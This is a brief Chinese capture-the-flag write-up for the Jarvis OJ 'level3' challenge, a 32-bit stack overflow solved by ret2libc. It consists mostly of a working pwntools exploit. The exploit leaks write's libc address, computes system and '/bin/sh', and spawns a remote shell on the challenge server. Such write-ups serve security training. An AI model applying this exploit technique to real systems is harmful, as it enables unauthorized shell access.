[XMAN]level3

nc pwn2.jarvisoj.com 9879

 

 

 

Hint1: 本题附件已更新，请大家重新下载以免影响解题。

 

level3.rar.f795bbaa1e4a3f9d467317d6df936c6b

 

32位栈溢出，ret2libc

exp如下：

from pwn import *

#io = process('./level3')
#io = gdb.debug('./level3')
io = remote('pwn2.jarvisoj.com', 9879)
elf = ELF('./level3')
#libc = elf.libc
libc = ELF('./libc-2.19.so')

io.recvuntil('Input:\n')
payload = b'a' * 140 + p32(0x8048340) + p32(0x804844B) + p32(1) + p32(0x804A018) + p32(4)
io.send(payload)
write_addr = u32(io.recv(4))
info("write_addr:" + str(hex(write_addr)))
libc_base = write_addr - libc.symbols['write']
info("libc_base:" + str(hex(libc_base)))

io.recvuntil('Input:\n')
system_addr = libc.symbols['system'] + libc_base
info("system_addr:" + str(hex(system_addr)))
binsh_addr = next(libc.search(b'/bin/sh')) + libc_base
info("binsh_addr:" + str(hex(binsh_addr)))
payload = b'a' * 140 + p32(system_addr) + p32(0x804844B) + p32(binsh_addr)
io.send(payload)

io.interactive()